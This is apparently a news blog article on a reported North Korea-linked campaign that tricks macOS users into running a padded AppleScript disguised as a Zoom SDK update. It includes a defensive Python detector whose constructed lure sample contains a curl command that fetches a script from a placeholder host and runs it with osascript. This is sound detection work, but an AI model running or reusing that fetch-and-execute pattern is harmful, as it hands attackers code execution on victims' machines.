North Korea targets macOS users in latest heist

April 16, 2026
Close-up view of Bitcoin and Ethereum coins next to a laptop and pen on a black surface.
Photo by Leeloo The First on Pexels

The setup

Microsoft says it is tracking a Pyongyang-linked crew it calls Sapphire Sleet (the same cluster other vendors track as APT38 or BlueNoroff) that focuses on stealing cryptocurrency and finance-sector secrets. According to The Register's report, the group's latest wave uses fake recruiter profiles and phony technical interviews on platforms like LinkedIn to shepherd victims into staged support calls. Why write clever exploits when you can con a human? Social engineering is cheap, scalable and brutally effective.

The lure

According to the report, victims are invited to a fake Zoom support meeting and told to download a file named Zoom SDK Update.scpt. The .scpt extension marks a compiled AppleScript: macOS opens it in Script Editor rather than running it outright, so the victim has to press Run, and talking them into that is what the live support call is for. The script is padded with a large comment block and thousands of blank lines so the malicious logic sits far below the fold, where a quick glance in the editor will not catch it. It even invokes the legitimate macOS softwareupdate binary with an invalid parameter so the action looks authentic, before using curl to fetch and execute a chain of further attacker-controlled AppleScripts.
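A triage heuristic for the lure just described, written for this page as an added example (it is not code from Microsoft, The Register or the campaign itself): given AppleScript source text, it measures blank-line padding, extracts every `do shell script` command, and flags a `softwareupdate` call that uses a flag it does not recognise together with any command that downloads something and then hands it to an interpreter. It assumes the .scpt has already been decompiled to text (on macOS, `osadecompile file.scpt` does this); the padding threshold, the whitelist of softwareupdate flags, and the two samples, including the placeholder host name, are constructed for illustration.

```python
"""Heuristic triage of decompiled AppleScript for the padding-plus-curl lure pattern.

Added example for this page; thresholds and the flag whitelist are assumptions.
"""
import re
from dataclasses import dataclass, field

# `do shell script "..."`, honouring AppleScript's backslash escaping inside the string.
SHELL_CALL = re.compile(r'do shell script\s+"((?:[^"\\]|\\.)*)"', re.IGNORECASE)

DOWNLOADERS = ("curl", "wget")
INTERPRETERS = ("osascript", "sh", "bash", "zsh", "perl")

# softwareupdate flags an admin would plausibly type (assumed whitelist, not exhaustive).
KNOWN_SWU_FLAGS = {
    "-l", "--list", "-i", "--install", "-d", "--download", "-a", "--all",
    "-r", "--recommended", "--background", "--fetch-full-installer",
    "--verbose", "--no-scan", "--ignore", "--reset-ignored",
}

PAD_RUN_THRESHOLD = 200  # consecutive blank lines that count as padding (assumed)


@dataclass
class Triage:
    total_lines: int
    longest_blank_run: int
    shell_commands: list[str] = field(default_factory=list)
    findings: list[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # One oddity on its own is noise; two together is the lure pattern.
        return len(self.findings) >= 2


def _longest_blank_run(lines: list[str]) -> int:
    longest = run = 0
    for line in lines:
        run = run + 1 if not line.strip() else 0
        longest = max(longest, run)
    return longest


def _odd_softwareupdate(cmd: str) -> bool:
    """True if the command is softwareupdate invoked with a flag we do not recognise."""
    words = cmd.split()
    if not words or words[0].split("/")[-1] != "softwareupdate":
        return False
    return any(w.startswith("-") and w not in KNOWN_SWU_FLAGS for w in words[1:])


def _is_fetch_and_execute(cmd: str) -> bool:
    """True if a downloader appears and an interpreter follows it in the same command."""
    words = cmd.split()
    first_dl = next((i for i, w in enumerate(words) if w in DOWNLOADERS), None)
    if first_dl is None:
        return False
    for w in words[first_dl + 1:]:
        base = w.split("/")[-1]
        if base in INTERPRETERS or base.startswith("python"):
            return True
    return False


def triage(source: str) -> Triage:
    lines = source.splitlines()
    t = Triage(total_lines=len(lines), longest_blank_run=_longest_blank_run(lines))
    if t.longest_blank_run >= PAD_RUN_THRESHOLD:
        t.findings.append(f"padding: {t.longest_blank_run} consecutive blank lines")
    for m in SHELL_CALL.finditer(source):
        cmd = m.group(1).replace('\\"', '"')
        t.shell_commands.append(cmd)
        if _odd_softwareupdate(cmd):
            t.findings.append(f"softwareupdate with unrecognised flag: {cmd}")
        if _is_fetch_and_execute(cmd):
            t.findings.append(f"fetch-and-execute: {cmd}")
    return t


# Constructed samples. The host name is a placeholder, not a real indicator.
LURE_SAMPLE = (
    "-- Zoom SDK Update\n-- Applies the latest meeting SDK patch.\n"
    + "\n" * 3000
    + 'do shell script "softwareupdate --fetch-zoom-sdk"\n'
    + 'do shell script "curl -fsSL https://updates.example.invalid/s2.scpt '
      '-o /tmp/s2.scpt && osascript /tmp/s2.scpt"\n'
)

BENIGN_SAMPLE = (
    "-- Check for updates\n"
    'do shell script "softwareupdate -l"\n'
    'display dialog "Done"\n'
)

if __name__ == "__main__":
    for name, src in (("lure", LURE_SAMPLE), ("benign", BENIGN_SAMPLE)):
        result = triage(src)
        print(f"{name}: suspicious={result.suspicious}", *result.findings, sep="\n  ")
```

Run it over decompiled sources from a quarantine folder rather than over raw .scpt bytes; legitimate automation does occasionally shell out to curl, which is why a single finding is reported but only two or more together mark the file as suspicious.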

What the attackers take

From that single staged interaction the intrusion unfolds in several stages. Microsoft says the chain fetches payloads that set up a backdoor, register the machine with command-and-control servers, bypass macOS privacy controls (TCC), and harvest credentials and sensitive data: wallets, browser history, keychains, Apple Notes and Telegram logins. The report adds that each stage sends a distinct User-Agent string on its requests, which lets the operators track how far a given victim has progressed and serve payloads accordingly.

Why it matters

“Social engineering lets attackers route around hardened perimeters by convincing users to act on their behalf,” Sherrod DeGrippo, Microsoft’s global threat intelligence GM, told The Register. The emotional punch is simple: someone trusted asks you to click, and you do. This campaign is a reminder that the industry’s shift toward supply-chain and people-focused attacks (remember the Axios maintainer incident) means defenses must include training and skepticism, not just better signatures. How wary are you, really, when a recruiter wants to Zoom?

Sources: The Register